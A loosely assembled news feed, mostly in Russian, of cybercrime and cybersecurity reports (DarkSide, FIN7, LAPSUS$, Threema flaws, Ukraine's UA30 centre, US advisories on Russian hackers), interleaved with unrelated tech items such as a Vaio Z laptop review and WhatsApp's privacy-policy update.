Сегодня СОРМ разрабатывают несколько вендоров: VAS Experts, «Норси-Транс», «ТехАргос», «Сигналтек», «Специальные технологии» и ГК «Цитадель» (входит в «ИКС Холдинг», объединяет «МФИ Софт», «Основа Лаб», «Сигнатек»).
В Tele2 журналистам сообщили, что изучают документ. МТС, «Вымпелком», «МегаФон» отказались от комментариев.
Напомним, в среду Минцифры выступила еще с одной инициативой по СОРМ. Ведомство предложило ввести оборотные штрафы для операторов связи за отсутствие нужного оборудования.
Сотрудники Департамента защиты интересов общества и государства совместно со следователями Главного следственного управления Нацполиции разоблачили 36-летнего мужчину, который продавал информацию с ограниченным доступом. Уже установлено, что фигурант - бывший сотрудник таможенной службы Киевской области. Используя связи, которые он имел на таможне, злоумышленник через вебстраницу электронных объявлений продавал базы таможенной и налоговой службы. Такие услуги стоили от 300 гривен до пяти тысяч гривен.
Оперативники установили место жительства фигуранта, а также место расположения его «офиса». Во время проведения санкционированных обысков полицейские изъяли компьютерную технику с базами данных. Также изъяты мобильные телефоны, с которых через мессенджеры он общался с потенциальными покупателями. Сейчас устанавливается круг лиц, которые незаконно приобрели информацию с ограниченным доступом, а также сообщников, которые предоставили злоумышленнику указанные базы.
Досудебное расследование в уголовном производстве, начатом по ст. 361 -2 (Несанкционированное вмешательство в работу электронно-вычислительных машин (компьютеров)) Уголовного кодекса Украины, продолжается. Санкция статьи предусматривает наказание в виде лишения свободы на срок до шести лет с лишением права занимать определенные должности или заниматься определенной деятельностью на срок до трех лет. Сейчас решается вопрос об объявлении фигуранту подозрения.
• Source: [https://www.npu.gov.ua/news/majnovi...yu-z-baz-danix-podatkovoji- ta-mitnoji-sluzhb/](https://www.npu.gov.ua/news/majnovi-zlochini/policzejski- vikrili-cholovika-yakij-prodavav-informacziyu-z-baz-danix-podatkovoji-ta- mitnoji-sluzhb/)
Похоже, хакеры намерены сдержать свое обещание впредь тщательнее выбирать своих жертв.
Группировка DarkSide, атаковавшая американского топливного гиганта Colonial
Pipeline, заявила об атаках еще на три компании. Так, на ее сайте в даркнете
DarkSide Leaks появилось краткое изложение документации, предположительно
похищенной хакерами у трех компаний, но сами данные опубликованы не были.
Появление новых сведений на сайте DarkSide Leaks указывает на то, что
группировку совсем не останавливает ведущееся в отношении нее расследование
ФБР. Тем не менее, хакеры, похоже, намерены сдержать свое обещание впредь
тщательнее выбирать своих жертв после того, как из-за атаки на Colonial
Pipeline на всем западном побережье США возник дефицит бензина.
Одна из трех атакованных компаний находится в США, вторая – в Бразилии и третья – в Шотландии, и ни одна из них не задействована в критической инфраструктуре. Все три компании достаточно небольшие, чтобы сбой в их работе не привел к серьезным последствиям для общественности, как это произошло в случае с Colonial Pipeline.
Компания в США является реселлером технологических сервисов из Иллинойса. По словам хакеров, они похитили у нее 600 ГБ конфиденциальной информации, в том числе пароли, финансовые данные и сведения из отдела кадров, включая паспортные данные сотрудников.
Бразильская компания является реселлером оборудования для получения возобновляемой энергии. Киберпреступники заявили о похищении у нее более 400 ГБ данных, в том числе «персональные данные клиентов» и «подробности о соглашениях».
Шотландская компания занята в сфере архитектуры. По заявлению DarkSide, они похитили у нее 900 ГБ, в том числе контракты, коммерческие и персональные данные за последние три года.
Ни одна из трех компаний никак не прокомментировала заявления киберпреступников.
Открытие КИБЕРЦЕНТР UA30 произошло 13 мая 2021 при участии Президента Украины Владимира Зеленского, Вице-премьер-министра Михаила Федорова и Председателя Госспецсвязи Юрия Щиголя. КИБЕРЦЕНТР UA30 входит в структуру Государственной службы специальной связи и защиты информации Украины.
В 2020 году был заложен фундамент важных изменений в киберзащиты Украины - внедрена единая система киберзащиты с четким распределением функций и алгоритмов реагирования на инциденты. Открытие КИБЕРЦЕНТР UA30 - закономерный шаг в развитии системы.
Президент Украины Владимир Зеленский осмотрел тренинговый КИБЕРЦЕНТР и CERT- UA. Также в присутствии Главы государства специалисты отработали сценарий кибератаки на технологическую систему ветровой электростанции.
Президент поблагодарил всех специалистам, которые были привлечены к созданию КИБЕРЦЕНТР UA30.
«Это современные профессиональные молодые люди. В целом это пример того, что Украина меняется не просто на словах. Это первый такой центр в Украине, и это прекрасное начало. Будем продолжать », - сказал Глава государства.
Владимир Зеленский отметил, что в Украине будет создано учебное заведение для подготовки специалистов по кибербезопасности.
«У нас большие планы по подготовке таких специалистов. Кроме центра, мы готовимся к открытию университета для подготовки специалистов в сфере кибербезопасности. Скоро будем его презентовать. Украина имеет растить таких специалистов по 15 16 лет, чтобы они никуда не уезжали. Предлагать им работу, а они нам обеспечат безопасную жизнь », - подчеркнул Президент.
КИБЕРЦЕНТР трансформируется в сервисную структуру, которая будет предоставлять услуги киберзащиты, выявления и реагирования на киберугрозы как для государственных организаций, так и для рядовых граждан.
Вице-премьер министр Украины Михаил Федоров: «Наша команда ежедневно работает над защитой персональных данных украинском и до 2024 года мы создадим систему максимальной защиты государственных реестров. Сегодня мы представляем один из важных проектов киберреформы - КИБЕРЦЕНТР UA30. Стратегия киберреформы - UA30
КИБЕРЦЕНТР UA30 прежде всего берет на себя защиту критической информационной инфраструктуры. Это государственные реестры, цифровые услуги, государственные информационные ресурсы, информационные системы карточных компаний. Кроме того, он становится администратором безопасности Национального центра бронирования государственных информационных ресурсов, куда до 2024 года должны быть перенесены 80% реестров.
Председатель Госспецсвязи Юрий Щегол: «Наш центр имеет все возможности для международного взаимодействия. Украина имеет уникальный опыт борьбы с киберугрозами, мы представляем наше государство в этой сфере на мировом уровне ».
В КИБЕРЦЕНТР размещается правительственная команда реагирования на компьютерные чрезвычайные события Украины CERT-UA. Это единственная команда из Украины, имеет аккредитацию в FIRST и может оперативно взаимодействовать с командами реагирования из 97 стран мира.
В состав КИБЕРЦЕНТР также вошел обновленный Тренинговый КИБЕРЦЕНТР. Это единственный в Украине центр, дает возможность отрабатывать реальные сценарии кибератак в учебном процессе и получать практические навыки для работы в реальной среде. В мире насчитывается около 20 таких платформ, шесть из которых находятся в США.
Ученые Министерства энергетики США обратились к частному сектору за помощью в коммерциализации «сверхмощного» алгоритма обнаружения криптоджекинга, предназначенного для центров обработки данных.
Раскрытая в возможном контракте технология может с максимальной точностью выявлять незаконное программное обеспечение для майнинга, использующие свободные вычислительные мощности хостов для добычи криптовалют. Как утверждают ученые Министерства энергетики, это программное обеспечение борется с «растущей угрозой» распространения атак криптоджекинга, которая угрожает центрам обработки данных во всем мире.
Ученые Министерства энергетики в Национальной лаборатории штата Айдахо хотят остановить распространение ПО для скрытого майнинга, предлагая свою технологию обнаружения партнерам из частного сектора. Алгоритм сканирует приложения для обработки данных на предмет скрытых майнеров криптовалют. Он выявляет ПО для скрытого майнинга, используя технологию глубокого обучения, которая, по мнению исследователей, точнее двоичной классификации.
«Это изобретение представляет собой экспресс-тест, основанный на машинном переводе. Он позволяет убедиться, что двоичный файл, представленный для выполнения в системе центра обработки данных, не содержит вредоносных программ для майнинга криптовалют. Он использует механизм внимания в глубоком обучении для точного и надежного обнаружения вредоносных программ для майнинга, тайно развертываемых в системах высокопроизводительных вычислений. Этот подход основан на машинном переводе, а не на двоичной классификации».
Подробности работы алгоритма доступны только потенциальным партнерам, которых министерство надеется привлечь к разработке и в конечном итоге коммерциализации алгоритма обнаружения криптоджекинга на ранней стадии.
Летом 2019 года министерство энергетики США выделило грант в размере $1.05 млн организациям, работающим над коммерциализацией блокчейн-платформы по управлению распределением энергии. Согласно недавнему отчету компании Microsoft, хакеры стали чаще использовать атаки криптоджекинга в качестве отвлекающего маневра для более серьезных вторжений в системы безопасности.
• Source: beta.sam.gov/opp/f10cd406ec4a44379739e49762732269/view?keywords=cryptocurrency&sort=-modifiedDate&index=&is_active=false&page=1
The company that took over the Vaio laptop moniker expands its lineup with a
new Z 14-inch model, though it retains the light weight and high price tag of
Sony's original.
If the Vaio Z sounds familiar, you may be recalling Sony's ultraportable
laptop that was launched [over a decade
ago](https://www.zdnet.com/article/sony-vaio-z-ultralight-laptop-for-less-
than-6000/). That was when the electronics giant was firmly involved in the PC
market, but that came to a close in 2014, when [Sony stopped producing
computers](https://www.zdnet.com/article/sony-considers-sale-of-vaio-pc-
business/) and sold off that part of its business to a consortium that
eventually became Vaio Corporation. (Sony retains the Vaio trademark and has a
stake in the new company.)
Vaio Corp. has slowly resumed producing laptops with the familiar brand name,
including the Vaio SX14 that ZDNet's Cliff Joseph
reviewed when it launched in 2019
and has remained in production. Like Sony's versions, the new Vaio notebooks
feature attractive designs, solid features, and high-end price tags. With the
(re)launch of the Vaio Z, the
company is taking all of those things to a whole new level.
According to Vaio, the new Z is the first mass-produced laptop built from 3D-molded carbon fiber, a process the company says has been previously been relegated to racing car design. Combining toughness (being to withstand 4-foot drops, for instance) with light weight, the Vaio Z's chassis tips the scales at just under 2.3 pounds, despite possessing a 14-inch screen. It's coupled with a hinge design that can open the computer up with one hand and allows the top lid to open a full 180 degrees.
Despite its small footprint, the Vaio Z is packed with 11th-generation Intel Core i7-11375H mobile processor from the top-of-the-line H series to provide big performance. Three of the four configurations come with 16GB of RAM, while the top model comes with 32GB, while solid-state storage ranges from 512GB to 2TB. The 14-inch display features 4K resolution, but as one of its space- saving concessions, the Vaio Z doesn't offer discrete graphics, relying instead on the improved graphics from Intel's Iris Xe integrated GPU.
Vaio includes a few handy security features, such as a built-in shutter to allow you to cover up your webcam and something it calls User Sensing, a system that combines motion sensing and facial recognition to allow hands-free login when the Z detects you in front of the screen, but will lock automatically when you move away from the laptop. Connectivity includes 802.11a/b/g/n/ac/ax Wi-Fi 6 and a pair of USB Type C Thunderbolt 4 ports, while Vaio has improved its keyboard with a larger key pitch stroke (1.5mm to compared to 1.2mm) and a resigned backlight.
Those aware of the original Vaio Z series laptops know that they were pricey even by Sony's standards. Vaio keeps that tradition with its version, pricing the base configuration (16GB of RAM, 512GB solid-state drive) at a whopping $3,579 and going up from there for the other three editions. For $200 more, you can double your storage, and at $3,979, you can double it again to 2TB. Finally, the $4,179 configuration features both a 2TB SSD and 32 gigs of RAM.
Злоумышленники в разных регионах России в течение нескольких лет создавали интернет-ресурсы, на которых от имени юридических лиц и индивидуальных предпринимателей предлагали купить дорогостоящую сельскохозяйственную технику по ценам ниже рыночных. Тем, кто к ним обращался, они высылали подписанный договор купли-продажи, требуя внести предоплату. После перечисления денег переставали выходить на связь и взятые на себя обязательства не выполняли.
«По имеющимся данным, фигуранты могут быть причастны к нескольким сотням преступлений, в результате совершения которых потерпевшим, причинен ущерб на сумму свыше миллиарда рублей
В ходе обысков изъяли 24 единицы компьютерной техники, 75 модемов для выхода в интернет, мобильные устройства, 56 печатей, документы юридических лиц и индивидуальных предпринимателей, свыше 3 млн рублей и другие предметы, имеющие доказательственное значение.
tass.ru/proisshestviya/21203657
Генеральная прокуратура направила в суд уголовное дело в отношении 17-летнего жителя Минска, которому инкриминировано хищение имущества путем модификации компьютерной информации в составе организованных групп, а также мошенничество.
Согласно материалам дела обвиняемый не позднее сентября-октября 2022 года вступил в состав трех действовавших на территории Республики Беларусь преступных сообществ, которые специализировались на хищении средств граждан через использование фишинговых ссылок.
В данных сообществах он преимущественно выполнял роли «дроповода» и «сим- активатора»: заведомо зная о целях использования, организовывал регистрацию физическими и юридическими лицами SIM-карт белорусских операторов сотовой связи, а также регистрировал на эти номера учетные записи в мессенджерах, необходимые участникам групп для общения с потерпевшими и направления им фишинговых ссылок.
Схема хищения заключалась в том, что потерпевшим, которые разместили объявления на интернет-ресурсе, предлагалось перейти по фишинговой ссылке якобы для перечисления платы за приобретаемый у них товар. После такого перехода им предлагалось ввести реквизиты своих банковских платежных карт. Это, в свою очередь, позволяло участникам организованных групп неправомерно завладевать реквизитами чужих карт и похищать имевшиеся на них деньги.
Сумма похищенного превысила 13 тыс. рублей.
Кроме того, обвиняемый в апреле 2023 года завладел денежными средствами трех граждан в сумме 525 рублей, которые они платили якобы за направленный наложенным платежом мобильный телефон. В действительности в посылке обвиняемый направлял сухарики и пустую коробку от мобильного телефона.
Изучение материалов уголовного дела показало, что предварительное расследование по нему проведено всесторонне, полно и объективно, противоправные действия обвиняемого верно квалифицированы по ч.4 ст.212, ч.2 ст.209 Уголовного кодекса Республики Беларусь.
Мера пресечения в виде заключения под стражу применена правильно, оснований для ее изменения либо отмены не имеется.
Некоторые программисты-релоканты из России объединились с турецкими
преступниками для взлома компьютеров по всему миру, рассказали источники FT.
Местных жителей они предпочитают не трогать
В Турции выросло количество киберпреступлений, совершаемых группами хакеров из
числа программистов, покинувших Россию после объявления мобилизации.
Некоторые из прибывших россиян стали заниматься мелким онлайн-мошенничеством, объединяясь с местными преступниками для легализации доходов и продажи сведений, полученных с компьютеров по всему миру, на европейский рынок данных. Один из источников отметил, что преступники действуют избирательно и их жертвами чаще становятся не граждане Турции, чтобы не привлекать внимание местной полиции.
«Менее чем за год количество сообщений значительно возросло», — подтвердил другой собеседник издания.
В качестве примера FT приводит популярный среди киберпреступников онлайн- маркет, который исследователи в сфере безопасности прозвали «подпольным облаком логов». В последние месяцы его наводнили украденные данные о десятках миллионов кредитных карт, паролей и учетных записей для входа в систему. Клиенты получают купленные сведения через Telegram.
Украденные данные собрали с помощью вредоносной программы Redline, которая, похоже, обходит защиту большинства антивирусов, пишет FT. Эксперты полагают, что этот вирус случайно устанавливается на компьютер людьми, загружающими пиратские видеоигры и программное обеспечение.
Исследователи из Швейцарской высшей технической школы Цюриха (ETH Zurich) опубликовали доклад, в котором описали многочисленные проблемы безопасности в Threema, защищенном швейцарском мессенджере с оконечным шифрованием. Создатели Threema утверждают, что обнаруженные экспертами недостатки никогда не оказывали влияния на реальную работу приложения.
Threema — созданное в Швейцарии коммуникационное приложение, ориентированное на конфиденциальность и повышенную безопасность, которое применяется правительством страны, военными, а также более чем 10 млн пользователей и 7000 организаций по всему миру. Мессенджер позиционируется как альтернатива Signal и WhatsApp.
В своей работе ученые из ETH Zurich описывают сразу семь атак на протокол Threema, включая кражу приватных ключей, удаление сообщений, взлом аутентификации, спуфинг серверов и многое другое. Краткое описание обнаруженных проблем выглядит следующим образом:
Аналитики ETH Zurich сообщили обо всех обнаруженных проблемах разработчикам Threema еще в октябре 2022 года, предоставили им рекомендации по смягчению проблем, а также согласились не предавать уязвимости огласке до января 2023 года.
В итоге, 29 ноября 2022 года разработчики мессенджера перевели Threema на новый и более защищенный протокол связи Ibex. Когда же исследователи ETH Zurich обнародовали результаты свих исследований, разработчики опубликовали ответное [заявление](https://threema.ch/en/blog/posts/news-alleged-weaknesses- statement), в котором сообщили, что обнаруженные проблемы в целом малозначимы не никогда не оказывали фактического влияния на Threema. К тому же, уязвимый протокол, изученный исследователями, все равно более не используется, поэтому уязвимости названы интересными разве что с теоретической точки зрения.
Кроме того, в компании опровергают утверждения о том, что протокол Ibex был создан с учетом и на основе выводов исследователей из Швейцарской высшей технической школы Цюриха, заявляя, что протокол находился в разработке более 1,5 лет. Якобы релиз Ibex просто совпал с раскрытием информации об узявимостях.
Исследователям не понравилось столь пренебрежительное отношение к их работе, и они парируют в Twitter, что новый протокол, конечно же, более безопасен, ведь старый им удалось взломать шестью разными способами, и это учли при создании Ibex.
По договоренности с его адвокатом, во вторник 26 апреля в федеральную прокуратуру Центрального округа штата Калифорния в Лос-Анджелесе явился 46-летний Виктор Белоногофф, которому в пятницу было предъявлено обвинение в мошенничестве, но в тот день его не арестовали, очевидно, из гуманных соображений, дав возможность провести уик-энд с семьей.
Судя по имени и фамилии, его национальность не вызывает сомнений, а два «эф» вместо одного «в» на конце фамилии говорят о знатности рода. Такие фамилии в русской транскрипции не склоняются и звучат очень даже уважительно – Романофф, Смирнофф, Тинькофф и вот Белоногофф, который бросил на свой знатный род тень подозрения. Как гласит пресс-релиз прокуратуры от 22 апреля, «сегодня большое жюри обвинило бывшего главного управляющего расположенной в Лос-Анджелесе сетевой медиакомпании в предположительном создании нескольких компаний, которые обманули его работодателя минимум на 3 млн долларов, предоставляя счета за услуги, которые никогда не оказывались или стоимость которых завышалась».
Знакомые слова обвинения, но обычно такие обвинения выдвигают «медицинским мошенникам», а компания Render Media, Inc., работой которой руководил Белоногофф, занималась контактами со СМИ, производя и распространяя медийный контент на таких интернет-платформах, как Facebook. Офис компании, в которой числились 12 сотрудников, находился в лос-анджелесском районе Белл-Гроув, а сам Белоногофф живет в городке Сан-Матео, в 20 милях от Сан-Франциско. Предъявленное обвинение грозит ему лишением свободы сроком до 20 лет, но до решения суда он считается невиновным, чего нельзя сказать о бывшем вице- президенте Render Media Арье Клугере, который признал себя виновным в октябре позапрошлого года, согласился стать свидетелем обвинения в деле Белоногофф, и судья Стивен Уилсон приговорит его 24 октября этого года. Признав вину, проживающий в городе Сан-Антонио в Техасе 34-летний Клугер подтвердил, что вместе с Виктором Белоногофф «использовал бизнес-модель Render, занимаясь сложной схемой хищения с участием других компаний, работу которых они контролировали».
Компания Render Media, Inc. с 12 сотрудниками была создана с участием Виктора Белоногофф в 2013 году, и он управлял ею до 2018 года. Как утверждает обвинение, в тайне от владельцев компании Белоногофф создал шесть таких же медийных и рекламных корпораций, которые якобы работали по заказам Render и получали деньги за работу, которой не было. На это уходила прибыль Render Media, которая составлял примерно два миллиона долларов в год, а также предоставляемые этой компании кредиты, а созданные Виктором Белоногофф компании-пустышки пользовались брендом и контентом Render Media. Обвинение отмечает, что по инициативе Белоногофф его компания Render Media оплатила его же компании-пустышке якобы созданный видеоматериал, которого не было. Две другие «пустышки» Виктора Белоногофф продавали компании Render Media по вздутым ценам интернет-трафик, то есть информацию, передаваемую через компьютерную сеть за определённый период времени, а одна из его компаний пользовалась контентом Render, оставляя себе 90% полученной прибыли. Скрывая следы своей аферы, Белоногофф, предположительно, уничтожал служебную электронную переписку, а позже, когда компания Render Media вчинила ему гражданский иск, дал ложные показания под присягой. Иск был подан в Верховный суд графства Лос-Анджелес в феврале 2018 года, и ответчиками там значились Арье Клугер и Виктор Белоногофф, а также Виктория Белоногофф и Кристина Белоногофф. В январе того же года в тот же суд поступил иск банка American Express против «Белоногофф Виктор, он же Виктор Делоногофф», и в декабре 2021 года дело было прекращено.
Присвоим таким способом больше трех миллионов долларов, Виктор размещал их на своих личных счетах и тратил на личные нужды, если это можно назвать нуждами. В базе данных федеральных судов дела Виктора Белоногофф еще нет, но есть дело «Соединенные Штаты против Арье Клугера, он же Тим Виола», которого арестовали 22 сентября 2020 года и тогда же освободили под залог в 20 тыс. долларов, а в октябре, когда он признал себя виновным, снизили этот залог вдвое. Виктор Белоногофф проходит в деле Клугера как сообщник «СС-А», с которым совершались все до одного предъявленные Клугеру преступления, и можно предвидеть, что обвинение Виктору Белоногофф-Делоногофф будет пересказом обвинения Клугеру- Виоле.
О личности СС-А в деле Клугера ничего не сказано. На сайте поисковой компании Crunchbase я прочитал, что «хотя карьера сетевого медиа-предпринимателя Вика Белоногофф сейчас сконцентрирована на уточнении того, как доставлялся и потреблялся контент (компании Render Media – А.Г.), его путь в сетевые СМИ был нетрадиционным». Далее там написано, что в молодости Виктор Белоногофф учился в UCLA – Университете штата Калифорния в Лос-Анджелесе, получил там степень бакалавра-биохимика и учился управлению бизнесом. Работать он начал по своей научной специальности «менеджером в компаниях генной инженерии и почти десять лет провел в таких фирмах, как Applied Biosystems и Celera Genomics, занимаясь направлением новых продуктов от стадии исследования в коммерческое производство». С таким послужным списком прямая дорога в элиту научно- технической интеллигенции, а не в федеральную тюрьму, но, как гласит библейская мудрость, дорога в ад вымощена благими намерениями.
Куда шире, проще и понятнее оказалась дорога, которая привела в федеральную тюрьму 32-летнего украинского хакера Дениса Ярмака, которого 7 апреля приговорили в суде Сиэтла к 5 годам лишения свободы.
Арестовали его 30 ноября 2019 года в Таиланде по запросу федеральной прокуратуры Западного округа штата Вашингтон, и до февраля 2020 он боролся с экстрадицией, но затем согласился, и в мае был доставлен из Бангкока в Сиэтл и помещен в федеральную тюрьму SeaTac в 12 милях от города, где находится и по сей день. В ноябре прошлого года он признал себя виновным в одном эпизоде мошенничества и одном эпизоде хакерства, и 7 апреля судья Рикардо Мартинес приговорил его к 60 месяцам лишения свободы, отметив, что Ярмак провел за решеткой вспышку пандемии коронавируса, а теперь его застала там война на его родине Украине. «По некоторой иронии, - сказал судья, - страна, которую вы обкрадывали, сейчас возглавляет международные усилия по защите вашей страны, вашего народа, вашей семьи». В обвинении утверждалось, что группа хакеров FIN7, куда входил Ярмак, нанесла банкам, бизнесам, компаниям кредитных кар и потребителям США ущерб на сумму больше миллиарда долларов. С 24 февраля, когда Россия напала на Украину, сумма нашей военной помощи этой стране составила 3,4 млрд долларов.
Денис Ярмак, которого арестовали в международном аэропорту Бангкока, когда он женой возвращался на родину из свадебного путешествия в Таиланд, стал третьим приговорённым в США членом хакерской группировки FIN7. 16 апреля прошлого года украинец Федор Гладырь получил 10 лет лишения свободы, а 24 июня того же года украинца Андрия Колпакова приговорили к 7 годам тюрьмы. Гладыря арестовали в Германии, а Колпакова – в Испании. «Ярмак и его сообщники подвергли риску миллионы финансовых счетов, причинив американцам и американской экономике ущерб больше чем на миллиард долларов, – прокомментировал приговор Кеннет Полит, замминистра юстиции по уголовным делам. – Защита в интернете бизнесов – больших и малых – это главная задача министерства юстиции. Мы продолжаем работу с нашими международными партнерами, чтобы привлекать таких киберпреступников к ответу, вне зависимости от того, где они живут и насколько считают себя неизвестными».
В обвинении по делу Дениса Ярмака уточнялось, что только в Соединенных Штатах группе FIN7 удалось взломать компьютерные сети во всех 50 штатах и федеральном округе Колумбия, похитив данные больше 20 млн владельцев кредитных карт больше чем на 6,6 тыс. личных терминалах, расположенных на больше чем 3,6 тыс. бизнесов. При этом пострадавшие, в число которых входят такие компании ресторанов, как Chipotle Mexican Grill, Chili’s, Arby’s, Red Robin и Jason’s Deli, потеряли, по некоторым оценкам, больше миллиарда долларов. Помимо США группа FIN7 действовала в Англии, Франции и Австралии. «Выдавая себя за легальный бизнес, - заявил в пресс-релизе прокуратуры Доналд Войрет, начальник отделения ФБР в Сиэтле, - группа хакеров, в которую входил подсудимый, вербовала для помощи своим преступным действиям других участников. Но благодаря трудной работе правоохранителей, подсудимый, который отвечает за огромный ущерб, проведет несколько следующих лет в тюрьме». Среди прочего Ярмака обвиняли, и он признал себя виновным в том, что предоставлял другим участникам FIN7 похищенные данные сотрудников различных компаний. Кроме того, у него был доступ к десяткам папок с данными жертв через используемый группировкой портал JIRA. За хорошее поведение федерального зека в тюрьме с приговора снимется 15%, так что Денис Ярмак может выйти на свободу через 4 года и 3 месяца. Колпаков сидит в тюрьме SeaTac под Сиэтлом и может выйти оттуда 14 июня 2024 года, а Гладырь находится в федеральной тюрьме McRae CI в штате Джорджия и при хорошем поведении может освободиться 18 июля 2026 года.
Четыре года назад выходящий в Сан-Франциско ежемесячник Wired («Прослушка») написал, что «изучил работу таинственной хакерской группировки Fin7. Фактически, она напоминает технологическую компанию — с сотрудниками по всему миру, строгим рабочим расписанием и сильным исследовательским подразделением. Вот только никто не знает, где конкретно находятся ее участники и как остановить их активность». Далее журнал сообщил, что «хотя большинство криминальных хакерских группировок беспорядочно зарабатывают деньги, Fin7 действуют слаженно и организованно. Группа, участников которой обычно идентифицируют как русскоязычных, обычно работает по стандартному расписанию (с 9:00 до 18:00)». Судя по данным Wired, в группировке Fin7 существует хорошо обеспеченное исследовательское подразделение, которое помогает избежать идентификации программ антивирусам. «Fin7 работает профессионально, - написал журнал. - Группировке удается использовать изощренные фишинговые схемы, чтобы жертвы сами заражали свои рабочие сети. Исследователи говорят, что такой подход скорее напоминает государственную структуру, чем криминал».
KrebsOnSecurity recently reviewed a copy of the private chat messages between members of the LAPSUS$ cybercrime group in the week leading up to the arrest of its most active members last month. The logs show LAPSUS$ breached T-Mobile multiple times in March, stealing source code for a range of company projects. T-Mobile says no customer or government information was stolen in the intrusion.
LAPSUS$ is known for stealing data and then demanding a ransom not to publish or sell it. But the leaked chats indicate this mercenary activity was of little interest to the tyrannical teenage leader of LAPSUS$, whose obsession with stealing and leaking proprietary computer source code from the world’s largest tech companies ultimately led to the group’s undoing.
From its inception in December 2021 until its implosion late last month, LAPSUS$ operated openly on its Telegram chat channel, which quickly grew to more than 40,000 followers after the group started using it to leak huge volumes of sensitive data stolen from victim corporations.
https://krebsonsecurity[.]com/2022/04/leaked-chats-show-lapsus-stole-t-mobile- source-code
Хакеры на протяжении двух лет скрывались в сетях оборонных подрядчиков США
Преступники успешно взломали ряд оборонных подрядчиков, у которых есть контракты для Министерства обороны США.
Власти США рассказали подробности вредоносной кампании, в ходе которой хакеры, предположительно связанные с Россией, взломали сети нескольких оборонных подрядчиков США. В результате атак была раскрыта конфиденциальная информация о коммуникационной инфраструктуре США, занимающейся разработкой вооружений.
Согласно совместному бюллетеню Федерального бюро расследований (ФБР), Агентства национальной безопасности (АНБ) и Агентство по кибербезопасности и защите инфраструктуры (Cybersecurity and Infrastructure Security Agency, CISA), кампания началась как минимум в январе 2020 года и продолжалась до февраля нынешнего года. Хакеры успешно взломали проверенных оборонных подрядчиков, у которых есть контракты для Министерства обороны США и разведывательного сообщества.
В течение двухлетнего периода преступники сохраняли постоянный доступ к нескольким сетям подрядчиков. Во время атаки в 2021 году злоумышленники украли сотни документов, связанных с продуктами компании, отношениями с другими странами, внутренними кадровыми и юридическими вопросами.
Похищенные документы включали несекретную информацию, принадлежащую подрядчикам, незасекреченные электронные письма сотрудников и их государственных заказчиков, в которых обсуждаются частные подробности технологических и научных исследований. Украденные данные дают преступникам важную информацию о сроках разработки и развертывания платформ вооружения США, технических характеристиках транспортных средств и планах в отношении инфраструктуры связи и информационных технологий.
Хакеры использовали различные методы для взлома своих целей, включая сбор сетевых паролей с помощью целенаправленного фишинга, утечки данных и эксплуатацию уязвимостей в программном обеспечении. Закрепившись в сети жертвы, злоумышленники расширяют свои системные права, сопоставляя Active Directory и подключаясь к контроллерам домена. Затем они похищают учетные данные для других учетных записей и создают новые аккаунты.
Хакеры использовали виртуальные частные серверы для шифрования своих сообщений и сокрытия личности, а также устройства для малого и домашнего офиса (SOHO) в качестве операционных узлов, чтобы избежать обнаружения.
Находился в международном розыске – в Одессе полиция задержала гражданина РФ. Как только правоохранителям стало известно о его местонахождении, они произвели задержание.
За совершение преступлений на территории США разыскиваемый приговорен к пожизненному заключению.
Как выяснили оперативники Управления стратегических расследований в Одесской области Национальной полиции Украины, гражданин другой страны обвиняется в денежных махинациях, «выбивании» долгов, рэкете, мошенничестве, хакерстве, наркопреступлениях. За совершение преступлений в США он был приговорен к пожизненному заключению и выдан ордер на арест, а затем объявлен в международный розыск.
18 января, в Одессе, оперативники, следователи областной полиции совместно с прокуратурой задержали 48-летнего разыскиваемого в порядке статей 208 и 582 (особенности задержания лица, совершившего уголовные правонарушения за пределами Украины) Уголовного процессуального кодекса Украины.
По оперативным данным, мужчина незаконно попал на территорию Украины, эта информация проверяется. Прокурором Одесской областной прокуратуры готовится ходатайство в суд о применении к злоумышленнику ареста. Уже уведомлены компетентные органы США о его задержании.
• Source: mvs.gov.ua/news/v-odesi-policiya-zatrimala-gromadyanina-rf-yakii- naxodivsya-v-miznarodnomu-rozsuku
• Video:
В Москве обвинения в причастности к кибератакам неоднократно отвергали.
Их опубликовали на сайте Национального центра кибербезопасности Великобритании (NCSC). Дoкумент, как надеются его авторы, поможет противостоять деятельности хакерских группировок, связанных со Службой внешней разведки России (СВР). Среди таких организаций упоминаются Cozy Bear, The Dukes and APT29.
В в подготoвке документа принимали участие ФБР и Агентство национальной безопасности (АНБ) США, а также Агентство по обеспечению инфраструктурной и кибербезопасности (CISA) Соединённых Штатов.
"Рекомендации распространяются после официального заявления о том, что СВР стояла за взломом программного обеспечения SolarWinds в 2020 году.", — говорится в заявлении NCSC.
Компаниям и госорганам стоит своевременно устанавливать обновления программного oбеспечения, использовать многофакторную идентификацию, отслеживать пoдозрительные электронные письма, а также обучать персонал сетевой безопасности.
По словам авторов отчёта, русские хакеры используют и уязвимости в программном обеспечении, и более сложные алгоритмы. Часто преступники взламывают электронную почту сетевых администратoров.
Чтобы затруднить работу хакеров, иностранные спецслужбы советуют oграничить количество конфиденциальной информации на компьютерных системах, которые могут взломать хакеры. Стоит также свoевременно устанавливать обновления программного обеспечения, использовать антивирус и двухфакторную аутентификацию.
Авторы документа считают, что именно так хакеры пoлучают доступ к «зарубежным правительственным, дипломатическим, аналитическим и энергетическим организациям, а также к организациям здравоохранения». Предполагается, что таким образом СВР собирает разведданные по всему миру: в США, Великобритании, странах Европы и бывшего СССР.
WhatsApp will soon display a banner in your smartphone app explaining when it
will share your data with Facebook.
WhatsApp is moving ahead with its controversial change to its privacy terms
and it will soon push a banner to the app that it hopes will help explain that
the change doesn't mean you need to leave the service.
WhatsApp last month [delayed enforcing its new privacy
terms](https://www.zdnet.com/article/whatsapp-delays-take-it-or-leave-it-
privacy-terms-update-until-may/) after giving its two billion users the
'choice' to accept its new privacy terms by February 8, or essentially, stop
using the app.
The new date for users to accept the terms is May 15 and, ahead of that date,
[WhatsApp has posted a new blog](https://blog.whatsapp.com/more-information-
about-our-update) attempting to explain what the changes mean for users.
SEE:[Security Awareness and Training policy](https://www.techrepublic.com/resource-library/downloads/security- awareness-and-training-policy/)(TechRepublic Premium)
WhatsApp said it had deferred the policy change to "clear up the misinformation", but not before tens of millions of WhatsApp users started exploring alternatives, such as Signal and Telegram, the latter of which recently released a feature to [bring WhatsApp messages across to its platform](https://www.zdnet.com/article/telegram-now-lets-you-bring-across- chat-history-from-whatsapp/).
Part of WhatsApp's effort to clear up "confusion" is an in-app banner that explains the changes and further updates an [FAQ page about the changes](https://faq.whatsapp.com/general/security-and-privacy/were-updating- our-terms-and-privacy-policy).
"In the coming weeks, we'll display a banner in WhatsApp providing more information that people can read at their own pace," WhatsApp said in a new blogpost.
